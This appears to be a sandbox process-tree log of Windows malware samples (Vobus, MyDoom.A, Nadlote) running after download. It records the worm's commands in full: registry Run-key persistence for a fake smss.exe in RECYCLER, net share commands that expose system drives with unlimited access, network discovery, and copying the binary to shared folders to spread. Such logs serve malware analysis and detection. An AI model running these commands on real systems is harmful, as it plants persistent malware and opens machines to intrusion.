  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=1448,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5592 /prefetch:8
  2⤵
  PID:8184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7156,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6628 /prefetch:8
  2⤵
  PID:5928
- C:\Users\Admin\Downloads\Vobus.exe
  "C:\Users\Admin\Downloads\Vobus.exe"
  2⤵
  PID:7676
- C:\Users\Admin\Downloads\Vobus.exe
  "C:\Users\Admin\Downloads\Vobus.exe"
  2⤵
  PID:5964
- C:\Users\Admin\Downloads\Vobus.exe
  "C:\Users\Admin\Downloads\Vobus.exe"
  2⤵
  PID:7736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6972,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4496 /prefetch:8
  2⤵
  PID:8080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6784,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7076 /prefetch:8
  2⤵
  PID:7336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5648,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6616 /prefetch:8
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1604,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:6552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6884,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6156 /prefetch:8
  2⤵
  PID:2672
- C:\Users\Admin\Downloads\MyDoom.A.exe
  "C:\Users\Admin\Downloads\MyDoom.A.exe"
  2⤵
  PID:4576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7132,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6924 /prefetch:8
  2⤵
  PID:7572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6892,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6128 /prefetch:8
  2⤵
  PID:6480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3196,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4580 /prefetch:8
  2⤵
  PID:5452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6232,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6756 /prefetch:8
  2⤵
  PID:3720
- C:\Users\Admin\Downloads\Nadlote.exe
  "C:\Users\Admin\Downloads\Nadlote.exe"
  2⤵
  PID:620
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:1624
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:7344
- - C:\Windows\SysWOW64\CMD.exe
    CMD /C "c:\RECYCLER\smss.exe"
    3⤵
    PID:1648
  - - \??\c:\RECYCLER\smss.exe
      c:\RECYCLER\smss.exe
      4⤵
      PID:7568
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:2840
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:5564
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:964
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:5384
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:3564
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7700
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ipconfig > c:\RECYCLER\IP.dlx
        5⤵
        
        PID:336
      - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig
        6⤵
        Gathers network information
        
        PID:3676
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:4520
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:2176
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5936
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7088
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c net share Love2="c:\Documents and Settings" /unlimited | net share Love1=C:\Windows /unlimited | net share Love3=d:\ /unlimited
        5⤵
        
        PID:6392
      - C:\Windows\SysWOW64\net.exe
        
        net share Love2="c:\Documents and Settings" /unlimited
        6⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 share Love2="c:\Documents and Settings" /unlimited
        7⤵
        
        PID:5932
      - C:\Windows\SysWOW64\net.exe
        
        net share Love1=C:\Windows /unlimited
        6⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 share Love1=C:\Windows /unlimited
        7⤵
        
        PID:5836
      - C:\Windows\SysWOW64\net.exe
        
        net share Love3=d:\ /unlimited
        6⤵
        
        PID:5868
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 share Love3=d:\ /unlimited
        7⤵
        
        PID:5504
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "smss\smss.exe " /f
        5⤵
        
        PID:6172
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "smss\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:544
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:4964
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:1948
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:3352
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:3740
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.0 -n 2 -w 3 > "c:\RECYCLER\check_4_online.dlx"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3280
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.0 -n 2 -w 3
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1136
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6600
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7904
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5692
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:5444
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:3412
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6704
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:4932
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:1736
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7448
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 2 -w 3 > "c:\RECYCLER\check_4_online.dlx"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3512
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 2 -w 3
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7724
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6024
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7436
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:3512
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6496
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7064
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:2992
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6900
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:992
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:3676
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:7808
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6384
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:6360
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c net view \\127.0.0.1 > "c:\RECYCLER\send_ok.dlx"
        5⤵
        
        PID:5456
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6996
      - C:\Windows\SysWOW64\net.exe
        
        net view \\127.0.0.1
        6⤵
        Discovers systems in the same network
        
        PID:7308
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c COPY /Y "smss.EXE" "127.0.0.1\SharedDocs\smss.EXE"
        5⤵
        
        PID:3728
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6572
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:8120
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6540
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:8144
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5212
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7460
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7720
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:7520
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2384
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:2200
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:4408
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7988
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7960
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:1868
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5324
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:7176
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.2 -n 2 -w 3 > "c:\RECYCLER\check_4_online.dlx"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5172
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7428
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.2 -n 2 -w 3
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7848
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5804
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6160
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:6908
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c net view \\127.0.0.2 > "c:\RECYCLER\send_ok.dlx"
        5⤵
        
        PID:1108
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6788
      - C:\Windows\SysWOW64\net.exe
        
        net view \\127.0.0.2
        6⤵
        Discovers systems in the same network
        
        PID:7340
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c COPY /Y "smss.EXE" "127.0.0.2\SharedDocs\smss.EXE"
        5⤵
        
        PID:6484
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6548
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6316
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7012
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:5820
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:4572
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5220
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:6900
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5476
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4840
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:5492
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:6356
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6964
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        6⤵
        Modifies registry key
        
        PID:2868
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5856
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5920
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:7088
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5888
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.3 -n 2 -w 3 > "c:\RECYCLER\check_4_online.dlx"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2060
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5688
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:4980
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:7432
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:7396
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1620
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:5784
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:6436
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c net view \\127.0.0.3 > "c:\RECYCLER\send_ok.dlx"
        5⤵
        
        PID:5520
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c COPY /Y "smss.EXE" "127.0.0.3\SharedDocs\smss.EXE"
        5⤵
        
        PID:5608
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
        5⤵
        
        PID:7808
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7332
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7272
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:5420
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:1932
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKLM\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V smss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
      4⤵
      Modifies registry key
      PID:3252
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c REG ADD HKCU\Software\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /V Csrss /t REG_SZ /d "c:\RECYCLER\smss.exe " /f
    3⤵
    PID:7812
  - - C:\Windows\SysWOW64\reg.exe
